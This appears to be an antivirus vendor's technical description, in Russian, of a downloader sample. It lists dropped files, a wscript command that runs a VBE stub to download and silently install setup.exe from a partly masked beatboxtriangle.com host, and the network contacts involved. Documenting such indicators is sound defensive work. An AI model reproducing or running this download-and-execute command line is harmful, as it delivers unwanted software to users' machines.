Техническая информация
- %TEMP%\stb1.tmp\setup.exe -i e18486c93b574b10aa8bb2f9e8e5a08f -p BscscnPB /S
- %TEMP%\stb1.tmp\setup.exe (загружен из сети Интернет)
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://li#####.beatboxtriangle.com/install.aspx?b=###################" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i e18486c93b574b10aa8bb2f9e8e5a08f -p BscscnPB /S" "http://li#####.beatboxtriangle.com/?vn###########################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'li#####.beatboxtriangle.com':80
- li#####.beatboxtriangle.com/?vn#########################################################################################################################################################################################################
- li#####.beatboxtriangle.com/install.aspx?b=###################
- DNS ASK li#####.beatboxtriangle.com
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''